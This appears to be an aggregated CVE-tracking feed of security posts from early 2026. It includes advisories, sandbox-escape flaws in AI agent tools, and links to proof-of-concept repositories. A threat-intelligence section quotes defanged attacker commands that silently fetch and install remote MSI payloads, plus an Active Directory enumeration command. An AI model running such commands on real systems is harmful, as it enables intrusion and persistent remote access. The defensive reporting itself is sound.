A security flaw has been discovered in Tenda RX3 16.03.13.11. Affected by this vulnerability is an unknown functionality of the file /goform/openSchedWifi. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-base...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2181/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T21:30:19
1 posts
🟠 CVE-2026-2180 - High (8.8)
A vulnerability was identified in Tenda RX3 16.03.13.11. Affected is an unknown function of the file /goform/fast_setting_wifi_set. Such manipulation of the argument ssid_5g leads to stack-based buffer overflow. The attack can be launched remotely...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2180/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T09:30:22
1 posts
🟠 CVE-2026-2140 - High (8.8)
A vulnerability was identified in Tenda TX9 up to 22.03.02.10_multi. Affected by this issue is the function sub_4223E0 of the file /goform/setMacFilterCfg. Such manipulation of the argument deviceList leads to buffer overflow. The attack may be la...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2140/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T06:31:54
1 posts
🟠 CVE-2026-2137 - High (8.8)
A vulnerability has been found in Tenda TX3 up to 16.03.13.11_multi. This impacts an unknown function of the file /goform/SetIpMacBind. The manipulation of the argument list leads to buffer overflow. The attack can be initiated remotely. The explo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2137/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T06:31:53
1 posts
🟠 CVE-2026-2138 - High (8.8)
A vulnerability was found in Tenda TX9 up to 22.03.02.10_multi. Affected is the function sub_42D03C of the file /goform/SetStaticRouteCfg. The manipulation of the argument list results in buffer overflow. The attack can be launched remotely. The e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2138/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-08T03:30:35
1 posts
🔴 CVE-2025-15027 - Critical (9.8)
The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.03. This is due to the plugin allowing a user to update arbitrary user meta through the 'jay_login_register_ajax_create_f...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15027/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-07T03:30:18
1 posts
🟠 CVE-2026-2071 - High (8.8)
A vulnerability was found in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formP2PLimitConfig. Performing a manipulation of the argument except results in buffer overflow. The attack is possible to b...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2071/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-07T00:33:35
1 posts
🟠 CVE-2026-25762 - High (7.5)
AdonisJS is a TypeScript-first web framework. Prior to versions 10.1.3 and 11.0.0-next.9, a denial of service (DoS) vulnerability exists in the multipart file handling logic of @adonisjs/bodyparser. When processing file uploads, the multipart pars...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25762/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-07T00:31:59
1 posts
1 repos
🟠 CVE-2026-25732 - High (7.5)
NiceGUI is a Python-based UI framework. Prior to 3.7.0, NiceGUI's FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious fi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25732/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-07T00:31:53
2 posts
🔴 CVE-2026-25544 - Critical (9.8)
Payload is a free and open source headless content management system. Prior to 3.73.0, when querying JSON or richText fields, user input was directly embedded into SQL without escaping, enabling blind SQL injection attacks. An unauthenticated atta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25544/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25544 - Critical (9.8)
Payload is a free and open source headless content management system. Prior to 3.73.0, when querying JSON or richText fields, user input was directly embedded into SQL without escaping, enabling blind SQL injection attacks. An unauthenticated atta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25544/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-07T00:30:34
4 posts
1 repos
‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##BeyondTrust fixes easy-to-exploit pre-auth RCE vulnerability in remote access tools (CVE-2026-1731)
https://www.helpnetsecurity.com/2026/02/09/beyondtrust-remote-access-vulnerability-cve-2026-1731/
#RemoteAccess #PrivilegedAccessManagement #Enterprise #Cybersecurity #CVE
##BeyondTrust Patches Critical Pre-Authentication RCE Vulnerability in Remote Access Products
BeyondTrust reports a critical pre-authentication RCE vulnerability (CVE-2026-1731) in its Remote Support and Privileged Remote Access products, allowing unauthenticated attackers to execute OS commands.
**If you use self-hosted BeyondTrust Remote Support or PRA, this is important. Plan a quick update to the BT26-02 patches. Isolation probably won't work since these systems are designed for remote access. SaaS users are already protected, but self-hosted environments require manual action.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/beyondtrust-patches-critical-pre-authentication-rce-vulnerability-in-remote-access-products-1-5-4-d-s/gD2P6Ple2L
updated 2026-02-06T22:11:48
1 posts
🟠 CVE-2025-69212 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69212/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:57:22.450000
1 posts
🟠 CVE-2026-25593 - High (8.4)
OpenClaw is a personal AI assistant. Prior to 2026.1.20, an unauthenticated local client could use the Gateway WebSocket API to write config via config.apply and set unsafe cliPath values that were later used for command discovery, enabling comman...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25593/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:57:22.450000
2 posts
🔴 CVE-2026-25632 - Critical (10)
EPyT-Flow is a Python package designed for the easy generation of hydraulic and water quality scenario data of water distribution networks. Prior to 0.16.1, EPyT-Flow’s REST API parses attacker-controlled JSON request bodies using a custom deser...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25632/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25632 - Critical (10)
EPyT-Flow is a Python package designed for the easy generation of hydraulic and water quality scenario data of water distribution networks. Prior to 0.16.1, EPyT-Flow’s REST API parses attacker-controlled JSON request bodies using a custom deser...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25632/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:44:00
2 posts
🟠 CVE-2026-25628 - High (8.5)
Qdrant is a vector similarity search engine and vector database. From 1.9.3 to before 1.16.0, it is possible to append to arbitrary files via /logger endpoint using an attacker-controlled on_disk.log_file path. Minimal privileges are required (rea...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25628/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25628 - High (8.5)
Qdrant is a vector similarity search engine and vector database. From 1.9.3 to before 1.16.0, it is possible to append to arbitrary files via /logger endpoint using an attacker-controlled on_disk.log_file path. Minimal privileges are required (rea...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25628/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:43:54
1 posts
🔴 CVE-2026-25592 - Critical (9.9)
Semantic Kernel is an SDK used to build, orchestrate, and deploy AI agents and multi-agent systems. Prior to 1.70.0, an Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the Ses...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25592/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:58
2 posts
🔴 CVE-2026-25641 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, there is a sandbox escape vulnerability due to a mismatch between the key on which the validation is performed and the key used for accessing properties. Even though the key used in pr...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25641/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25641 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, there is a sandbox escape vulnerability due to a mismatch between the key on which the validation is performed and the key used for accessing properties. Even though the key used in pr...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25641/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:55
1 posts
🔴 CVE-2026-25587 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, as Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped. This vulnerability is fixed in 0.8.29.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:50
1 posts
🔴 CVE-2026-25586 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, a sandbox escape is possible by shadowing hasOwnProperty on a sandbox object, which disables prototype whitelist enforcement in the property-access path. This permits direct access to ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25586/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:47
2 posts
🔴 CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:43
2 posts
🟠 CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:28
1 posts
🟠 CVE-2026-25580 - High (8.6)
Pydantic AI is a Python agent framework for building applications and workflows with Generative AI. From 0.0.26 to before 1.56.0, aServer-Side Request Forgery (SSRF) vulnerability exists in Pydantic AI's URL download functionality. When applicatio...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25580/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:24
2 posts
🔴 CVE-2026-25520 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, The return values of functions aren't wrapped. Object.values/Object.entries can be used to get an Array containing the host's Function constructor, by using Array.prototype.at you can ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25520/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25520 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.29, The return values of functions aren't wrapped. Object.values/Object.entries can be used to get an Array containing the host's Function constructor, by using Array.prototype.at you can ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25520/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:17
1 posts
🟠 CVE-2026-23989 - High (8.2)
REVA is an interoperability platform. Prior to 2.42.3 and 2.40.3, a bug in the GRPC authorization middleware of the "Reva" component of OpenCloud allows a malicious user to bypass the scope verification of a public link. By exploiting this via the...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23989/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:30:58
2 posts
🟠 CVE-2026-2067 - High (8.8)
A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/formTimeGroupConfig. The manipulation of the argument year1 leads to buffer overflow. The attack may be ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2067/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2067 - High (8.8)
A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/formTimeGroupConfig. The manipulation of the argument year1 leads to buffer overflow. The attack may be ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2067/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T19:14:34
1 posts
🔴 CVE-2026-25725 - Critical (10)
Claude Code is an agentic coding tool. Prior to version 2.1.2, Claude Code's bubblewrap sandboxing mechanism failed to properly protect the .claude/settings.json configuration file when it did not exist at startup. While the parent directory was m...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25725/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T19:02:42
1 posts
🔴 CVE-2026-25722 - Critical (9.1)
Claude Code is an agentic coding tool. Prior to version 2.0.57, Claude Code failed to properly validate directory changes when combined with write operations to protected folders. By using the cd command to navigate into sensitive directories like...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25722/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T18:30:43
2 posts
CVE-2026-2103 - Infor Syteline ERP
https://blog.blacklanternsecurity.com/p/cve-2026-2103-infor-syteline-erp
##CVE-2026-2103 - Infor Syteline ERP - Keys Included: No Assembly Required https://blog.blacklanternsecurity.com/p/cve-2026-2103-infor-syteline-erp
##updated 2026-02-06T16:45:15.323000
4 posts
1 repos
Here's a summary of the latest technology and cybersecurity news from the last 24-48 hours:
Major tech firms globally plan to invest over $650 billion in AI infrastructure this year. OpenAI has launched "Frontier," a new enterprise platform for AI agents.
In cybersecurity, CISA mandated US federal agencies replace unsupported edge devices within 18 months due to state-sponsored exploitation. Russia's APT28 targeted European entities with a new Microsoft Office exploit. A critical SmarterMail flaw (CVE-2026-24423) is actively exploited in ransomware attacks. (Feb 6-7, 2026).
##Global news highlights include the kickoff of the 2026 Winter Olympics in Italy (Feb 7). In technology, OpenAI launched its Frontier enterprise AI agent platform. Apple acquired AI startup Q.AI for $2B, while Google reported significant AI-driven profit gains. Intel and AMD warned of server CPU shortages impacting China due to AI demand. The EU is also scrutinizing TikTok's "addictive design".
Cybersecurity saw CISA warn of a critical SmarterMail vulnerability (CVE-2026-24423) actively exploited in ransomware campaigns (Feb 7). Italian authorities thwarted Russian cyberattacks targeting government and Olympic-related websites. A rise in AI-driven phishing attacks was also reported.
##"CISA warns of SmarterMail RCE flaw used in ransomware attacks"
"[...] has issued a warning about CVE-2026-24423, an unauthenticated remote code execution (RCE) flaw in SmarterMail that is used in ransomware attacks. The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S."
##CISA warns of SmarterMail RCE flaw used in ransomware attacks
The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S. has issued a warning about CVE-2026-24423, an unauthenticated remote code...
🔗️ [Bleepingcomputer] https://link.is.it/Kkych1
##updated 2026-02-06T09:30:35
6 posts
1 repos
Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
💬 How are you reducing blast radius for management infrastructure?
🔔 Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution
Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.
**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-fortinet-forticlientems-allows-remote-code-execution-7-8-j-i-r/gD2P6Ple2L
Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
💬 How are you reducing blast radius for management infrastructure?
🔔 Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution
Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.
**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-fortinet-forticlientems-allows-remote-code-execution-7-8-j-i-r/gD2P6Ple2L
updated 2026-02-05T21:38:32
1 posts
4 repos
https://github.com/N3k0t-dev/PoC-CVE-collection
https://github.com/boroeurnprach/CVE-2025-11953-PoC
https://github.com/SaidBenaissa/cve-2025-11953-vulnerability-demo
⚪ Critical Metro4Shell Vulnerability Exploited to Breach Development Systems
🗨️ Attackers are actively exploiting the critical CVE-2025-11953 vulnerability in the React Native Metro server to infect developers’ systems with malware for Windows and Linux.
##updated 2026-02-04T21:09:38
1 posts
1 repos
https://github.com/otakuliu/Expression-Sandbox-Escape-Simulation-Lab
⚪ Critical bug in n8n opened the door to RCE
🗨️ A critical vulnerability has been discovered in the n8n workflow automation platform that allowed arbitrary command execution on the server side. The issue, identified as CVE-2026-25049 (scored 9.4 on the CVSS scale), affects the sandbox mechanism that is supposed to isolate the execution of JavaScr…
##updated 2026-02-04T02:00:02.030000
1 posts
----------------
🎯 Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
🔹 solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
🔗 Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##updated 2026-02-03T12:30:35
1 posts
To drobiazg, ale kluczowy dla prywatności. CERT Polska potwierdził podatność w rządowej aplikacji mObywatel na iOS. Jeśli nie zaktualizowałeś jej w ostatnich dniach, Twój PESEL może świecić z ekranu nawet po wyjściu z aplikacji.
Błąd oznaczony jako CVE-2025-11598 dotyczy mechanizmu App Switcher (przełączania aplikacji). Gdy minimalizujesz aplikację na iPhone (przesuwając palcem od dołu), system robi jej „zrzut ekranu”, by wyświetlić go na karcie podglądu. Dobre aplikacje bankowe (i rządowe) powinny w tym momencie automatycznie zamazywać ekran (blur), by nikt, kto weźmie Twój telefon do ręki i wejdzie w listę otwartych apek, nie zobaczył stanu konta czy danych dowodu.
Wersje mObywatela poniżej 4.71.0 tego nie robiły. Efekt? Nieuprawniona osoba mogła podejrzeć Twoje dane bez logowania, po prostu przeglądając otwarte w tle aplikacje. Oczywiście wymagało to i tak fizycznego dostępu do Twojego iPhone’a i odblokowanego ekranu, ale niemniej problem z bezpieczeństwem istniał.
Sprawa jest prosta: wejdź do App Store i upewnij się, że masz wersję 4.71.0 lub nowszą. Poprawka już tam jest. Ten błąd w starszej wersji mObywatela wykrył i przesłał ekipie CERT.pl Maciej Krakowiak z DSecure.me.
#aktualizacjaMObywatel #bezpieczeństwoIPhone #błądMObywatel #CERTPolska #CVE202511598 #mObywatelIOS ##
updated 2026-01-31T00:31:36
2 posts
2 repos
Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##updated 2026-01-30T13:28:18.610000
4 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws
A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…
##“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.”
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##Orgs that still daftly run Ivanti kit and didn't patch for CVE-2026-1281 (which is likely most b/c if you're still running Ivanti you have no idea how to do cyber or IT) are gonna have a really bad day today or later this week once they realize what happened to them over the weekend.
##If you have Ivanti EPMM, please follow these instructions.
“Technical Analysis updated with reliable Indicators of Compromise (IoC’s). Both in partnership with NCSC-NL.”
The Dutchies are at it again!🤘🇳🇱
#EPMM #CVE20261281 #CVE20261340 #Ivanti #Cybersecurity #infosec #ioc
##updated 2026-01-30T00:31:28
3 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws
A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…
##“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.”
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##If you have Ivanti EPMM, please follow these instructions.
“Technical Analysis updated with reliable Indicators of Compromise (IoC’s). Both in partnership with NCSC-NL.”
The Dutchies are at it again!🤘🇳🇱
#EPMM #CVE20261281 #CVE20261340 #Ivanti #Cybersecurity #infosec #ioc
##updated 2026-01-29T18:32:39
2 posts
@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 — Published: 2025-12-31
##@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 — Published: 2025-12-31
##updated 2026-01-29T15:31:31
3 posts
4 repos
https://github.com/guiimoraes/CVE-2025-15467
https://github.com/MAXI8594/CVE-2025-15467_Scan
This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##@gehrke_test "nginx proxy manager" klingt jetzt nicht danach als würde es CMS überhaupt benutzen, und falls doch, ist CVE-2025-15467 auf Platformen mit Stack Canaries (i.e., alles was nicht ranziges embedded Zeug ist) ein denial of service, kein RCE.
##updated 2026-01-23T16:05:22
1 posts
Aw man, someone had to go and ruin all our fun with https://www.cve.org/CVERecord?id=CVE-2026-21441 😩
##updated 2026-01-14T20:31:32.760000
1 posts
Windows Error Reporting Flaw Lets Standard Users Reach SYSTEM: Inside CVE-2026-20817
Introduction A quiet but deeply dangerous vulnerability inside Windows Error Reporting (WER) has exposed a new path for local privilege escalation, allowing ordinary users to obtain near-SYSTEM level control. Tracked as CVE-2026-20817 and patched by Microsoft in January 2026, the flaw sits in a core crash-handling mechanism that runs by default on nearly every Windows machine. While no…
##updated 2025-11-04T00:31:52
1 posts
#OT #Advisory VDE-2025-109
Phoenix Contact: Unbounded growth of the session cache in TCP encapsulation service in FL MGUARD 2xxx and 4xxx firmware
The OpenSSL library used in the affected products is vulnerable to an unbounded growth of the session cache in the TLSv1.3 implementation.
#CVE CVE-2024-2511
https://certvde.com/en/advisories/vde-2025-109/
#CSAF https://phoenixcontact.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2025-109.json
##updated 2025-10-27T17:12:40.607000
4 posts
46 repos
https://github.com/tripoloski1337/CVE-2025-53770-scanner
https://github.com/chrisalee27-dotcom/SOC-Incident-Response-Portfolio
https://github.com/behnamvanda/CVE-2025-53770-Checker
https://github.com/Bluefire-Redteam-Cybersecurity/bluefire-sharepoint-cve-2025-53770
https://github.com/n1chr0x/ZeroPoint
https://github.com/ghostn4444/CVE-2025-53770
https://github.com/ZephrFish/CVE-2025-53770-Scanner
https://github.com/AdityaBhatt3010/CVE-2025-53770-SharePoint-Zero-Day-Variant-Exploited-for-Full-RCE
https://github.com/bossnick98/-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE
https://github.com/yosasasutsut/Blackash-CVE-2025-53770
https://github.com/RukshanaAlikhan/CVE-2025-53770
https://github.com/anwakub/CVE-2025-53770
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
https://github.com/CyprianAtsyor/ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend
